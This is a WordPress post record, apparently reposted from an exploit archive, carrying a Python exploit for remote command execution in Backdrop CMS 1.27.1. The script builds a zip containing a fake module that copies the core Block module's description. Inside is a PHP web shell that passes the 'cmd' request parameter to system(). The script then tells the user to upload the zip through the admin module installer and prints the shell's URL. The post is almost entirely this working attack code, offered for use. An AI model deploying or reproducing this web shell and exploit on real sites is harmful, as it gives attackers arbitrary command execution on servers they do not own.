{"id":56941,"date":"2024-05-20T19:40:13","date_gmt":"2024-05-20T15:40:13","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178631\/backdropcms1271-exec.txt"},"modified":"2024-05-20T19:40:13","modified_gmt":"2024-05-20T15:40:13","slug":"backdrop-cms-1-27-1-remote-command-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/backdrop-cms-1-27-1-remote-command-execution\/","title":{"rendered":"Backdrop CMS 1.27.1 Remote Command Execution"},"content":{"rendered":"<p># Exploit Title: Backdrop CMS 1.27.1 &#8211; Remote Command Execution (RCE)<br \/># Date: 04\/27\/2024<br \/># Exploit Author: Ahmet \u00dcmit BAYRAM<br \/># Vendor Homepage: https:\/\/backdropcms.org\/<br \/># Software Link: https:\/\/github.com\/backdrop\/backdrop\/releases\/download\/1.27.1\/backdrop.zip<br \/># Version: latest<br \/># Tested on: MacOS<\/p>\n<p>import os<br \/>import time<br \/>import zipfile<\/p>\n<p>def create_files():<br \/>info_content = &#8220;&#8221;&#8221;<br \/>type = module<br \/>name = Block<br \/>description = Controls the visual building blocks a page is constructed<br \/>with. Blocks are boxes of content rendered into an area, or region, of a<br \/>web page.<br \/>package = Layouts<br \/>tags[] = Blocks<br \/>tags[] = Site Architecture<br \/>version = BACKDROP_VERSION<br \/>backdrop = 1.x<\/p>\n<p>configure = admin\/structure\/block<\/p>\n<p>; Added by Backdrop CMS packaging script on 2024-03-07<br \/>project = backdrop<br \/>version = 1.27.1<br \/>timestamp = 1709862662<br \/>&#8220;&#8221;&#8221;<br \/>shell_info_path = &#8220;shell\/shell.info&#8221;<br \/>os.makedirs(os.path.dirname(shell_info_path), exist_ok=True) # Klas\u00f6r\u00fc<br \/>olu\u015fturur<br \/>with open(shell_info_path, &#8220;w&#8221;) as file:<br \/>file.write(info_content)<\/p>\n<p>shell_content = &#8220;&#8221;&#8221;<br \/>&lt;html&gt;<br \/>&lt;body&gt;<br \/>&lt;form method=&#8221;GET&#8221; name=&#8221;&lt;?php echo basename($_SERVER[&#8216;PHP_SELF&#8217;]); ?&gt;&#8221;&gt;<br \/>&lt;input type=&#8221;TEXT&#8221; name=&#8221;cmd&#8221; autofocus id=&#8221;cmd&#8221; size=&#8221;80&#8243;&gt;<br \/>&lt;input type=&#8221;SUBMIT&#8221; value=&#8221;Execute&#8221;&gt;<br \/>&lt;\/form&gt;<br \/>&lt;pre&gt;<br \/>&lt;?php<br \/>if(isset($_GET[&#8216;cmd&#8217;]))<br \/>{<br \/>system($_GET[&#8216;cmd&#8217;]);<br \/>}<br \/>?&gt;<br \/>&lt;\/pre&gt;<br \/>&lt;\/body&gt;<br \/>&lt;\/html&gt;<br \/>&#8220;&#8221;&#8221;<br \/>shell_php_path = &#8220;shell\/shell.php&#8221;<br \/>with open(shell_php_path, &#8220;w&#8221;) as file:<br \/>file.write(shell_content)<\/p>\n<p>return shell_info_path, shell_php_path<\/p>\n<p>def create_zip(info_path, php_path):<br \/>zip_filename = &#8220;shell.zip&#8221;<br \/>with zipfile.ZipFile(zip_filename, &#8216;w&#8217;) as zipf:<br \/># Dosyalar\u0131 shell klas\u00f6r\u00fc alt\u0131nda sakla<br \/>zipf.write(info_path, arcname=&#8217;shell\/shell.info&#8217;)<br \/>zipf.write(php_path, arcname=&#8217;shell\/shell.php&#8217;)<br \/>return zip_filename<\/p>\n<p>def main(url):<br \/>print(&#8220;Backdrop CMS 1.27.1 &#8211; Remote Command Execution Exploit&#8221;)<br \/>time.sleep(3)<\/p>\n<p>print(&#8220;Evil module generating&#8230;&#8221;)<br \/>time.sleep(2)<\/p>\n<p>info_path, php_path = create_files()<br \/>zip_filename = create_zip(info_path, php_path)<\/p>\n<p>print(&#8220;Evil module generated!&#8221;, zip_filename)<br \/>time.sleep(2)<\/p>\n<p>print(&#8220;Go to &#8221; + url + &#8220;\/admin\/modules\/install and upload the &#8221; +<br \/>zip_filename + &#8221; for Manual Installation.&#8221;)<br \/>time.sleep(2)<\/p>\n<p>print(&#8220;Your shell address:&#8221;, url + &#8220;\/modules\/shell\/shell.php&#8221;)<\/p>\n<p>if __name__ == &#8220;__main__&#8221;:<br \/>import sys<br \/>if len(sys.argv) &lt; 2:<br \/>print(&#8220;Usage: python script.py [url]&#8221;)<br \/>else:<br \/>main(sys.argv[1])<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Backdrop CMS 1.27.1 &#8211; Remote Command Execution (RCE)# Date: 04\/27\/2024# Exploit Author: Ahmet \u00dcmit BAYRAM# Vendor Homepage: https:\/\/backdropcms.org\/# Software Link: https:\/\/github.com\/backdrop\/backdrop\/releases\/download\/1.27.1\/backdrop.zip# Version: latest# Tested on: MacOS import osimport timeimport zipfile def create_files():info_content = &#8220;&#8221;&#8221;type = modulename = Blockdescription = Controls the visual building blocks a page is constructedwith. Blocks are boxes of &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56941","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56941","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56941"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56941\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56941"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56941"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56941"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}